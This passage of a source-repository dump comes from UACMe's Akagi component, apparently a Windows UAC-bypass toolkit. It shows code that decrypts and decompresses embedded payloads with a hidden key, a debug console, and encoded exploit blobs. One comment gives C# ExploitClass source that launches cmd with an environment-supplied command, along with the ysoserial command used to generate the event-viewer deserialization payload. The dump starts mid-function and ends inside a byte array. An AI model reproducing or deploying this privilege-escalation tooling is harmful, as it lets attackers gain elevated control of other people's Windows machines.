PDWORD pcbKeyBlob\n)\n{\n    ULONG i, c;\n    ULONG dataSize = 0;\n    PDCK_HEADER secretsBlob;\n    PVOID pbSecret = NULL, resourceBlob;\n\n    if (pcbKeyBlob)\n        *pcbKeyBlob = 0;\n\n    resourceBlob = supLdrQueryResourceData(SECRETS_ID,\n        g_hInstance,\n        &dataSize);\n\n    if (resourceBlob) {\n\n        secretsBlob = (PDCK_HEADER)supHeapAlloc(dataSize);\n        if (secretsBlob) {\n\n            RtlCopyMemory(secretsBlob, 
resourceBlob, dataSize);\n            EncodeBuffer(secretsBlob, dataSize, AKAGI_XOR_KEY);\n\n            c = dataSize / sizeof(DCK_HEADER);\n            for (i = 0; i < c; i++) {\n                if (secretsBlob[i].Id == Id) {\n                    pbSecret = supHeapAlloc(UACME_KEY_SIZE);\n                    if (pbSecret != NULL) {\n                        RtlCopyMemory(pbSecret, secretsBlob[i].Data, UACME_KEY_SIZE);\n                        if (pcbKeyBlob)\n                            *pcbKeyBlob = UACME_KEY_SIZE;\n                    }\n                    break;\n                }\n            }\n\n            RtlSecureZeroMemory(secretsBlob, dataSize);\n            supHeapFree(secretsBlob);\n        }\n\n    }\n\n    return pbSecret;\n}\n\n/*\n* IsValidContainerHeader\n*\n* Purpose:\n*\n* Basic sanity checks over container header.\n*\n*/\nBOOL IsValidContainerHeader(\n    _In_ PDCU_HEADER UnitHeader,\n    _In_ DWORD FileSize\n)\n{\n    DWORD HeaderCrc;\n\n    if (UnitHeader == NULL)\n        return FALSE;\n\n    __try {\n        if ((UnitHeader->Magic != UACME_CONTAINER_PACKED_DATA) &&   //Naka\n            (UnitHeader->Magic != UACME_CONTAINER_PACKED_UNIT) &&   //Naka\n            (UnitHeader->Magic != UACME_CONTAINER_PACKED_CODE) &&   //Kuma\n            (UnitHeader->Magic != UACME_CONTAINER_PACKED_KEYS))     //Kuma\n        {\n            return FALSE;\n        }\n\n        //\n        // Note that IV has different meaning in Kuma containers.\n        //\n\n        HeaderCrc = UnitHeader->HeaderCrc;\n        UnitHeader->HeaderCrc = 0;\n        if (RtlComputeCrc32(0, UnitHeader, sizeof(DCU_HEADER)) != HeaderCrc) {\n            UnitHeader->HeaderCrc = HeaderCrc;\n            return FALSE;\n        }\n        UnitHeader->HeaderCrc = HeaderCrc;\n\n        if ((UnitHeader->cbData == 0) ||\n            (UnitHeader->cbDeltaSize == 0))\n            return FALSE;\n        if (UnitHeader->cbData > FileSize)\n            return FALSE;\n        if 
(UnitHeader->cbDeltaSize > FileSize)\n            return FALSE;\n        if (UnitHeader->cbDeltaSize > UnitHeader->cbData)\n            return FALSE;\n    }\n    __except (EXCEPTION_EXECUTE_HANDLER) {\n        return FALSE;\n    }\n\n    return TRUE;\n}\n\n/*\n* DecryptBuffer\n*\n* Purpose:\n*\n* Decrypt AES encrypted buffer.\n*\n* Use supVirtualFree to release allocated result.\n*\n*/\nBOOL DecryptBuffer(\n    _In_    PBYTE  pbBuffer,\n    _In_    DWORD  cbBuffer,\n    _In_    PBYTE  pbIV,\n    _In_    PBYTE  pbSecret,\n    _In_    DWORD  cbSecret,\n    _Out_   PBYTE *pbDecryptedBuffer,\n    _Out_   PDWORD pcbDecryptedBuffer\n)\n{\n    BOOL                bResult = FALSE;\n    BCRYPT_ALG_HANDLE   hAlgAes = NULL;\n    BCRYPT_KEY_HANDLE   hKey = NULL;\n    HANDLE              heapCNG = NULL;\n    DWORD               cbCipherData, cbKeyObject, cbResult, cbBlockLen;\n    PBYTE               pbKeyObject = NULL, pbCipherData = NULL;\n    SIZE_T              memIO;\n    NTSTATUS            status;\n\n    do {\n\n        heapCNG = HeapCreate(0, 0, 0);\n        if (heapCNG == NULL)\n            break;\n\n        if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(\n            &hAlgAes,\n            BCRYPT_AES_ALGORITHM,\n            NULL,\n            0)))\n        {\n            break;\n        }\n\n        cbKeyObject = 0;\n        cbResult = 0;\n\n        if (!NT_SUCCESS(BCryptGetProperty(\n            hAlgAes,\n            BCRYPT_OBJECT_LENGTH,\n            (PUCHAR)&cbKeyObject,\n            sizeof(DWORD),\n            &cbResult,\n            0)))\n        {\n            break;\n        }\n\n        pbKeyObject = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbKeyObject);\n        if (pbKeyObject == NULL)\n            break;\n\n        cbBlockLen = 0;\n\n        if (!NT_SUCCESS(BCryptGetProperty(hAlgAes,\n            BCRYPT_BLOCK_LENGTH,\n            (PUCHAR)&cbBlockLen,\n            sizeof(DWORD),\n            &cbResult,\n            0)))\n        {\n            break;\n       
 }\n\n        if (cbBlockLen > DCU_IV_MAX_BLOCK_LENGTH)\n            break;\n\n        if (!NT_SUCCESS(BCryptGenerateSymmetricKey(\n            hAlgAes,\n            &hKey,\n            pbKeyObject,\n            cbKeyObject,\n            pbSecret,\n            cbSecret,\n            0)))\n        {\n            break;\n        }\n\n        cbCipherData = 0;\n        if (!NT_SUCCESS(BCryptDecrypt(\n            hKey,\n            pbBuffer,\n            cbBuffer,\n            NULL,\n            pbIV,\n            cbBlockLen,\n            NULL,\n            0,\n            &cbCipherData,\n            BCRYPT_BLOCK_PADDING)))\n        {\n            break;\n        }\n\n        memIO = (SIZE_T)cbCipherData;\n\n        pbCipherData = (PBYTE)supVirtualAlloc(\n            &memIO,\n            DEFAULT_ALLOCATION_TYPE,\n            DEFAULT_PROTECT_TYPE,\n            &status);\n\n        if ((!NT_SUCCESS(status)) || (pbCipherData == NULL))\n            break;\n\n        cbResult = 0;\n        if (!NT_SUCCESS(BCryptDecrypt(\n            hKey,\n            pbBuffer,\n            cbBuffer,\n            NULL,\n            pbIV,\n            cbBlockLen,\n            pbCipherData,\n            cbCipherData,\n            &cbResult,\n            BCRYPT_BLOCK_PADDING)))\n        {\n            break;\n        }\n\n        BCryptDestroyKey(hKey);\n        hKey = NULL;\n\n        *pbDecryptedBuffer = pbCipherData;\n        *pcbDecryptedBuffer = cbCipherData;\n\n        bResult = TRUE;\n\n    } while (FALSE);\n\n    if (hKey != NULL)\n        BCryptDestroyKey(hKey);\n\n    if (hAlgAes != NULL)\n        BCryptCloseAlgorithmProvider(hAlgAes, 0);\n\n    if (heapCNG) HeapDestroy(heapCNG);\n\n    if (bResult == FALSE) {\n        if (pbCipherData) supVirtualFree(pbCipherData, NULL);\n        *pbDecryptedBuffer = NULL;\n        *pcbDecryptedBuffer = 0;\n    }\n\n    return bResult;\n}\n\n/*\n* DecompressContainerUnit\n*\n* Purpose:\n*\n* Decompress given container.\n*\n* Use supVirtualFree to 
release allocated result.\n*\n*/\nPVOID DecompressContainerUnit(\n    _In_ PBYTE pbBuffer,\n    _In_ DWORD cbBuffer,\n    _In_ PBYTE pbSecret,\n    _In_ DWORD cbSecret,\n    _Out_ PULONG pcbDecompressed\n)\n{\n    PDCU_HEADER     UnitHeader;\n\n    PBYTE           pbDecryptedBuffer = NULL;\n    DWORD           cbDecryptedBuffer = 0;\n\n    DELTA_INPUT     diDelta, diSource;\n    DELTA_OUTPUT    doOutput;\n\n    PVOID           UncompressedData = NULL;\n    SIZE_T          memIO;\n\n    PBYTE           DataPtr;\n\n    NTSTATUS        status;\n\n    if (pcbDecompressed)\n        *pcbDecompressed = 0;\n\n    do {\n\n        UnitHeader = (PDCU_HEADER)pbBuffer;\n\n        if (!IsValidContainerHeader(UnitHeader, cbBuffer))\n            break;\n\n        DataPtr = (PBYTE)UnitHeader + sizeof(DCU_HEADER);\n\n        if (!DecryptBuffer(\n            (PBYTE)DataPtr,\n            (DWORD)UnitHeader->cbData,\n            (PBYTE)UnitHeader->bIV,\n            (PBYTE)pbSecret,\n            (DWORD)cbSecret,\n            (PBYTE*)&pbDecryptedBuffer,\n            (PDWORD)&cbDecryptedBuffer))\n        {\n            break;\n        }\n\n        if (cbDecryptedBuffer > cbBuffer)\n            break;\n\n        RtlSecureZeroMemory(&diSource, sizeof(DELTA_INPUT));\n        RtlSecureZeroMemory(&diDelta, sizeof(DELTA_INPUT));\n        RtlSecureZeroMemory(&doOutput, sizeof(DELTA_OUTPUT));\n\n        diDelta.Editable = FALSE;\n        diDelta.lpcStart = pbDecryptedBuffer;\n        diDelta.uSize = UnitHeader->cbDeltaSize;\n\n        if (ApplyDeltaB(DELTA_FILE_TYPE_RAW, diSource, diDelta, &doOutput)) {\n\n            memIO = doOutput.uSize;\n            UncompressedData = supVirtualAlloc(\n                &memIO,\n                DEFAULT_ALLOCATION_TYPE,\n                DEFAULT_PROTECT_TYPE,\n                &status);\n\n            if ((NT_SUCCESS(status)) && (UncompressedData != NULL)) {\n\n                RtlCopyMemory(UncompressedData, doOutput.lpStart, doOutput.uSize);\n                if 
(pcbDecompressed)\n                    *pcbDecompressed = (ULONG)doOutput.uSize;\n\n            }\n            DeltaFree(doOutput.lpStart);\n        }\n\n    } while (FALSE);\n\n    if (pbDecryptedBuffer != NULL) {\n        supVirtualFree(pbDecryptedBuffer, NULL);\n    }\n\n    return UncompressedData;\n}\n\n/*\n* DecompressPayload\n*\n* Purpose:\n*\n* Decode payload and then decompress it.\n*\n*/\nPVOID DecompressPayload(\n    _In_ ULONG PayloadId,\n    _In_ PVOID pbBuffer,\n    _In_ ULONG cbBuffer,\n    _Out_ PULONG pcbDecompressed\n)\n{\n    BOOL        bResult = FALSE;\n    ULONG       FinalDecompressedSize = 0;\n    SIZE_T      memIO;\n    PUCHAR      UncompressedData = NULL;\n\n    PVOID       Data = NULL;\n\n    PBYTE       pbSecret = NULL;\n    DWORD       cbSecret = 0, DataSize;\n\n    NTSTATUS    status;\n\n    __try {\n\n        DataSize = cbBuffer;\n\n        do {\n\n            //\n            // Make a writeable buffer copy.\n            //\n\n            memIO = DataSize;\n            Data = supVirtualAlloc(\n                (PSIZE_T)&memIO,\n                DEFAULT_ALLOCATION_TYPE,\n                DEFAULT_PROTECT_TYPE,\n                &status);\n\n            if ((!NT_SUCCESS(status)) || (Data == NULL))\n                break;\n\n            supCopyMemory(Data, memIO, pbBuffer, DataSize);\n\n            //\n            // Get key for decryption.\n            //\n            pbSecret = (PBYTE)SelectSecretFromBlob(PayloadId, &cbSecret);\n            if ((pbSecret == NULL) || (cbSecret == 0))\n                break;\n\n            UncompressedData = (PUCHAR)DecompressContainerUnit(\n                (PBYTE)Data,\n                DataSize,\n                pbSecret,\n                cbSecret,\n                &FinalDecompressedSize);\n\n            if (UncompressedData == NULL)\n                break;\n\n            //\n            // Validate uncompressed data, skip for dotnet.\n            //\n            if 
(!supVerifyMappedImageMatchesChecksum(UncompressedData, FinalDecompressedSize)) {\n\n                if (!supIsCorImageFile(UncompressedData)) {\n\n#ifdef _DEBUG\n                    supDebugPrint(\n                        TEXT(\"DecompressPayload\"),\n                        ERROR_DATA_CHECKSUM_ERROR);\n#endif\n                    break;\n                }\n            }\n\n            bResult = TRUE;\n\n        } while (FALSE);\n\n    }\n    __except (EXCEPTION_EXECUTE_HANDLER) {\n        bResult = FALSE;\n    }\n\n    if (pbSecret) supHeapFree(pbSecret);\n\n    if (Data) {\n        supVirtualFree(Data, NULL);\n    }\n\n    if (bResult == FALSE) {\n        if (UncompressedData != NULL) {\n            supVirtualFree(UncompressedData, NULL);\n            UncompressedData = NULL;\n        }\n        FinalDecompressedSize = 0;\n    }\n\n    if (pcbDecompressed)\n        *pcbDecompressed = FinalDecompressedSize;\n\n    return UncompressedData;\n}\n"
  },
  {
    "path": "Source/Akagi/compress.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2022\n*\n*  TITLE:       COMPRESS.H\n*\n*  VERSION:     3.61\n*\n*  DATE:        22 Jun 2022\n*\n*  Prototypes and definitions for compression.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#include <msdelta.h>\n#include <compressapi.h>\n#include <bcrypt.h>\n\n#define UACME_CONTAINER_PACKED_UNIT 'UPCU' //Naka handling\n#define UACME_CONTAINER_PACKED_DATA 'DPCU' //Naka handling\n#define UACME_CONTAINER_PACKED_CODE 'CPCU' //Kuma handling\n#define UACME_CONTAINER_PACKED_KEYS 'KPCU' //Kuma handling\n\n//Initialization vector max bytes\n#define DCU_IV_MAX_BLOCK_LENGTH 16\n\ntypedef struct _DCU_HEADER {\n    DWORD Magic;\n    DWORD cbData;\n    DWORD cbDeltaSize;\n    DWORD HeaderCrc;\n    BYTE bIV[DCU_IV_MAX_BLOCK_LENGTH];\n    //PBYTE pbData[1];     /* not a member of the structure */\n} DCU_HEADER, *PDCU_HEADER;\n\ntypedef PVOID(*pfnDecompressPayload)(\n    _In_ ULONG PayloadId,\n    _In_ PVOID pbBuffer,\n    _In_ ULONG cbBuffer,\n    _Out_ PULONG pcbDecompressed);\n\nPVOID DecompressPayload(\n    _In_ ULONG PayloadId,\n    _In_ PVOID pbBuffer,\n    _In_ ULONG cbBuffer,\n    _Out_ PULONG pcbDecompressed);\n\nVOID EncodeBuffer(\n    _In_ PVOID Buffer,\n    _In_ ULONG BufferSize,\n    _In_ ULONG Key);\n"
  },
  {
    "path": "Source/Akagi/console.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2022 - 2026\n*\n*  TITLE:       CONSOLE.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        12 Feb 2026\n*\n*  Debug console.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\nHANDLE StdOutputHandle = NULL;\n\npswprintf_s _swprintf_s = NULL;\n\nVOID ConsolePrint(\n    _In_ LPCWSTR Message\n)\n{\n    WriteConsole(StdOutputHandle, Message, (ULONG)_strlen(Message), NULL, NULL);\n}\n\nVOID ConsolePrintValueUlong(\n    _In_ LPCWSTR Message,\n    _In_ ULONG Value,\n    _In_ BOOL Hexademical\n)\n{\n    WCHAR szText[200];\n\n    if (_swprintf_s) {\n\n        _swprintf_s(szText, RTL_NUMBER_OF(szText),\n            Hexademical ? 
TEXT(\"%ws 0x%lX\\r\\n\") : TEXT(\"%ws %lu\\r\\n\"),\n            Message,\n            Value);\n\n        ConsolePrint(szText);\n    }\n}\n\nVOID ConsolePrintStatus(\n    _In_ LPCWSTR Message,\n    _In_ NTSTATUS Status\n)\n{\n    ConsolePrintValueUlong(Message, Status, TRUE);\n}\n\nVOID ConsoleInit(\n    VOID\n)\n{\n    WCHAR szBuffer[100];\n    HMODULE hNtdll = GetModuleHandle(L\"ntdll.dll\");\n\n    if (hNtdll == NULL || !AllocConsole())\n        return;\n\n    _swprintf_s = (pswprintf_s)GetProcAddress(hNtdll, \"swprintf_s\");\n    if (_swprintf_s == NULL)\n        return;\n\n    StdOutputHandle = GetStdHandle(STD_OUTPUT_HANDLE);\n    SetConsoleMode(StdOutputHandle, ENABLE_PROCESSED_OUTPUT |\n        ENABLE_VIRTUAL_TERMINAL_PROCESSING);\n\n    _swprintf_s(szBuffer, RTL_NUMBER_OF(szBuffer), TEXT(\"[*] UACMe v%lu.%lu.%lu.%lu\\r\\n\"),\n        UCM_VERSION_MAJOR,\n        UCM_VERSION_MINOR,\n        UCM_VERSION_REVISION,\n        UCM_VERSION_BUILD);\n\n    SetConsoleTitle(szBuffer);\n}\n\nBOOL ConsoleIsKeyPressed(\n    _In_ WORD VirtualKeyCode\n)\n{\n    BOOL bResult = FALSE;\n    DWORD numberOfEvents = 0;\n    INPUT_RECORD inp1;\n    HANDLE nStdHandle = GetStdHandle(STD_INPUT_HANDLE);\n\n    GetNumberOfConsoleInputEvents(nStdHandle, &numberOfEvents);\n\n    if (numberOfEvents) {\n\n        PeekConsoleInput(nStdHandle, &inp1, 1, &numberOfEvents);\n\n        bResult = (numberOfEvents != 0 &&\n            inp1.EventType == KEY_EVENT &&\n            inp1.Event.KeyEvent.bKeyDown &&\n            inp1.Event.KeyEvent.wVirtualKeyCode == VirtualKeyCode);\n\n        FlushConsoleInputBuffer(nStdHandle);\n    }\n\n    return bResult;\n}\n\nVOID ConsoleRelease(\n    VOID\n)\n{\n    DWORD dwStart = GetTickCount();\n    HANDLE nStdHandle = GetStdHandle(STD_INPUT_HANDLE);\n\n    if (nStdHandle == NULL || nStdHandle == INVALID_HANDLE_VALUE) {\n        FreeConsole();\n        return;\n    }\n\n    ConsolePrint(TEXT(\"[+] Press Enter to exit or wait few seconds and it will close 
automatically\\r\\n\"));\n\n    FlushConsoleInputBuffer(nStdHandle);\n    while (!ConsoleIsKeyPressed(VK_RETURN) && (GetTickCount() - dwStart) < (10 * 1000))\n        Sleep(50);\n\n    FreeConsole();\n}\n"
  },
  {
    "path": "Source/Akagi/console.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2022\n*\n*  TITLE:       CONSOLE.H\n*\n*  VERSION:     3.62\n*\n*  DATE:        08 Jul 2022\n*\n*  Debug console header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\nVOID ConsoleInit(\n    VOID);\n\nVOID ConsoleRelease(\n    VOID);\n\nVOID ConsolePrintStatus(\n    _In_ LPCWSTR Message,\n    _In_ NTSTATUS Status);\n\nVOID ConsolePrint(\n    _In_ LPCWSTR Message);\n\nVOID ConsolePrintValueUlong(\n    _In_ LPCWSTR Message,\n    _In_ ULONG Value,\n    _In_ BOOL Hexademical);\n\n#ifdef _UCM_CONSOLE\n#define ucmConsoleInit ConsoleInit\n#define ucmConsoleRelease ConsoleRelease\n#define ucmConsolePrintStatus ConsolePrintStatus\n#define ucmConsolePrint ConsolePrint\n#define ucmConsolePrintValueUlong ConsolePrintValueUlong\n#else\n#define ucmConsoleInit()\n#define ucmConsoleRelease()\n#define ucmConsolePrintStatus(Message, Status)\n#define ucmConsolePrint(Message)\n#define ucmConsolePrintValueUlong(Message, Value, Hexademical)\n#endif\n"
  },
  {
    "path": "Source/Akagi/encresource.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016 - 2025\n*\n*  TITLE:       ENCRESOURCE.H\n*\n*  VERSION:     3.68\n*\n*  DATE:        07 Mar 2025\n*\n*  Encoded string resources.\n*\n*  1) g_encodedKamikazeFinal - Kamikaze final stage launcher\n*  2) string table elements\n*  3) g_encodedRecentViews - eventvwr cache element generated with ysoserial\n*  4) g_encodedRecentViewsV2 - eventvwr cache element for dotnet2 generated with ysoserial\n*  5) g_encodedTaskParamBegin, g_encodedTaskParamEnd - parameters data for the scheduler task\n*  6) g_webviewvsinfo - WebView version info block\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nstatic const unsigned char g_encodedKamikazeFinal[121] = {\n    0x46, 0x9C, 0x9D, 0xBE, 0xCA, 0x73, 0xA6, 0x57, 0x04, 0xB2, 0xD4, 0x65, 0x8A, 0x1E, 0xB8, 0xC4,\n    0x04, 0xAA, 0xC1, 0x55, 0xB3, 0xD5, 0x2E, 0xD0, 0x19, 0xB8, 0xCC, 0x37, 0x99, 0x2A, 0xA6, 0xD8,\n    0x19, 0x81, 0x9D, 0xB6, 0xF5, 0x25, 0xFF, 0x59, 0x07, 0x95, 0xC2, 0x36, 0xDB, 0x0C, 0xB5, 0xD2,\n    0x45, 0xF8, 0x90, 0x1F, 0xB3, 0xC0, 0x2A, 0x90, 0x37, 0x8A, 0xC2, 0x28, 0xDC, 0x41, 0xBB, 0xC5,\n    0x1F, 0xD6, 0xC5, 0xF1, 0x83, 0x3E, 0xE3, 0x46, 0x1F, 0xB3, 0xC0, 0x3F, 0xC4, 0x04, 0xAD, 0xD3,\n    0x48, 0xF8, 0x99, 0x49, 0xF4, 0x81, 0x78, 0xE7, 0x0E, 0xA5, 0xD9, 0x34, 0xC5, 0x0A, 0xBA, 0x9F,\n    0x53, 0xCF, 0xD5, 0xFC, 0xD5, 0x2E, 0xE8, 0x5C, 0x1B, 0xA2, 0x93, 0x67, 0x99, 0x0F, 0xB4, 0xD2,\n    0x14, 0xE4, 0x89, 0x44, 0xBE, 0xD9, 0x37, 0xD9, 0x55\n};\n\nstatic const unsigned char g_encodedRecentViews[1411] = {\n\t0x7A, 0xF5, 0xE9, 0xD3, 0xA7, 0xB0, 0x61, 0xC2, 0x85, 0xF5, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 
0x9A, 0xB7, 0x9D, 0x1F, 0xEC, 0x52,\n\t0x19, 0x91, 0x9A, 0xA0, 0x89, 0x1C, 0xEA, 0x5C, 0x08, 0x80, 0xA0, 0xBD, 0xC1, 0x20, 0xA0, 0x30,\n\t0x70, 0xD4, 0xC9, 0xF3, 0x87, 0x73, 0xB1, 0x4E, 0x1E, 0xCE, 0xB9, 0xA1, 0xC8, 0x2C, 0xFB, 0x4E,\n\t0x09, 0xCA, 0xE4, 0xD9, 0x87, 0x6F, 0xA2, 0x12, 0x35, 0x96, 0x83, 0xB6, 0xC4, 0x3B, 0xDA, 0x5C,\n\t0x0E, 0x95, 0xB9, 0xA1, 0xC8, 0x39, 0xF7, 0x59, 0x1F, 0x86, 0xC7, 0x9C, 0xC5, 0x25, 0xFB, 0x5E,\n\t0x0E, 0xBD, 0x87, 0xA0, 0xD3, 0x2E, 0xF0, 0x5E, 0x1F, 0xCA, 0xE4, 0xD9, 0x9B, 0x60, 0xD1, 0x5F,\n\t0x10, 0x91, 0x8A, 0xA7, 0xE3, 0x2E, 0xEA, 0x5C, 0x2A, 0x86, 0x86, 0xA5, 0xCE, 0x2B, 0xFB, 0x4F,\n\t0x44, 0xFF, 0xE2\n};\n\n/*\n// ExploitClass.dll\nusing System;\n\nclass ExploitClass\n{\n\tpublic ExploitClass()\n\t{\n\t\tSystem.Diagnostics.Process.Start(\"cmd\", \"/c \" + Environment.GetEnvironmentVariable(\"pe386\"));\n\t}\n}\n\nysoserial_frmv2.exe -o raw -f BinaryFormatter -g ActivitySurrogateSelectorFromFile -c .\\ExploitClass.cs;System.dll > RecentViews\n*/\nstatic const unsigned char g_encodedRecentViewsV2[8427] = {\n\t0x7A, 0xF5, 0xE9, 0xD3, 0xA7, 0xB0, 0x61, 0xC2, 0x85, 0xF5, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF8, 0xEB, 0xD3, 0xA7, 0x4F, 0xD0, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xDA, 0x5C,\n\t0x0E, 0x95, 0xC5, 0xF3, 0xF1, 0x2A, 0xEC, 0x4E, 0x13, 0x9B, 0x87, 0xEE, 0x95, 0x61, 0xAE, 0x13,\n\t0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 0x51, 0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48,\n\t0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48, 0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69,\n\t0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x2D, 0xA9, 0x0A, 0x1B, 0xC1, 0x8A, 0xE6, 0x91, 0x7E, 0xA7, 0x0E,\n\t0x4E, 0x91, 0xD9, 0xEB, 0x9E, 0x4A, 0x9F, 0x3D, 0x7A, 0xF4, 0xFA, 0x80, 0xDE, 0x3C, 0xEA, 0x58,\n\t0x17, 0xDA, 0xAD, 0xB2, 0xD3, 0x2E, 0xB0, 0x79, 0x1B, 0x80, 0x88, 0x80, 0xC2, 0x3B, 0x94, 0x3D,\n\t0x7A, 0xF4, 0xFF, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x81, 0xC2, 0x22, 0xF1, 0x49,\n\t0x13, 0x9A, 0x8E, 0x95, 0xC8, 0x3D, 0xF3, 
0xA0, 0x4D, 0x97, 0x01, 0x7A, 0xF4, 0xE9, 0xD9, 0xAD, 0x45, 0x9A, 0x09,\n\t0x7A, 0xF4, 0xE9, 0xE3, 0xF4, 0x36, 0xED, 0x49, 0x1F, 0x99, 0xC7, 0x97, 0xC2, 0x23, 0xFB, 0x5A,\n\t0x1B, 0x80, 0x8C, 0x80, 0xC2, 0x3D, 0xF7, 0x5C, 0x16, 0x9D, 0x93, 0xB2, 0xD3, 0x26, 0xF1, 0x53,\n\t0x32, 0x9B, 0x85, 0xB7, 0xC2, 0x3D, 0xB5, 0x79, 0x1F, 0x98, 0x8C, 0xB4, 0xC6, 0x3B, 0xFB, 0x78,\n\t0x14, 0x80, 0x9B, 0xAA, 0xA0, 0x4F, 0x9E, 0x3D, 0x7E, 0x80, 0x90, 0xA3, 0xC2, 0x47, 0xFF, 0x4E,\n\t0x09, 0x91, 0x84, 0xB1, 0xCB, 0x36, 0x98, 0x49, 0x1B, 0x86, 0x8E, 0xB6, 0xD3, 0x5D, 0xEA, 0x5C,\n\t0x08, 0x93, 0x8C, 0xA7, 0xF3, 0x36, 0xEE, 0x58, 0x3B, 0x87, 0x9A, 0xB6, 0xCA, 0x2D, 0xF2, 0x44,\n\t0x74, 0x80, 0x88, 0xA1, 0xC0, 0x2A, 0xEA, 0x69, 0x03, 0x84, 0x8C, 0x9D, 0xC6, 0x22, 0xFB, 0x37,\n\t0x17, 0x91, 0x9D, 0xBB, 0xC8, 0x2B, 0xD0, 0x5C, 0x17, 0x91, 0xE4, 0xB7, 0xC2, 0x23, 0xFB, 0x5A,\n\t0x1B, 0x80, 0x8C, 0x96, 0xC9, 0x3B, 0xEC, 0x44, 0x7B, 0xF5, 0xEB, 0xD2, 0xA6, 0x4E, 0x9D, 0x0D,\n\t0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x79, 0x1F, 0x98, 0x8C, 0xB4, 0xC6, 0x3B, 0xFB, 0x6E,\n\t0x1F, 0x86, 0x80, 0xB2, 0xCB, 0x26, 0xE4, 0x5C, 0x0E, 0x9D, 0x86, 0xBD, 0xEF, 0x20, 0xF2, 0x59,\n\t0x1F, 0x86, 0xC2, 0x97, 0xC2, 0x23, 0xFB, 0x5A, 0x1B, 0x80, 0x8C, 0x96, 0xC9, 0x3B, 0xEC, 0x44,\n\t0x7C, 0xC9, 0xE9, 0xD3, 0xA7, 0x9A, 0x9F, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xD8, 0x48,\n\t0x14, 0x97, 0x89, 0xE1, 0xFC, 0x14, 0xCD, 0x44, 0x09, 0x80, 0x8C, 0xBE, 0x89, 0x0D, 0xE7, 0x49,\n\t0x1F, 0xAF, 0xB4, 0xFF, 0x87, 0x22, 0xED, 0x5E, 0x15, 0x86, 0x85, 0xBA, 0xC5, 0x63, 0xBE, 0x6B,\n\t0x1F, 0x86, 0x9A, 0xBA, 0xC8, 0x21, 0xA3, 0x0F, 0x54, 0xC4, 0xC7, 0xE3, 0x89, 0x7F, 0xB2, 0x1D,\n\t0x39, 0x81, 0x85, 0xA7, 0xD2, 0x3D, 0xFB, 0x00, 0x14, 0x91, 0x9C, 0xA7, 0xD5, 0x2E, 0xF2, 0x11,\n\t0x5A, 0xA4, 0x9C, 0xB1, 0xCB, 0x26, 0xFD, 0x76, 0x1F, 0x8D, 0xBD, 0xBC, 0xCC, 0x2A, 0xF0, 0x00,\n\t0x18, 0xC3, 0xDE, 0xB2, 0x92, 0x2C, 0xAB, 0x0B, 0x4B, 0xCD, 0xDA, 0xE7, 0xC2, 0x7F, 0xA6, 0x04,\n\t0x27, 0xD8, 0xB2, 0x80, 0xDE, 0x3C, 0xEA, 
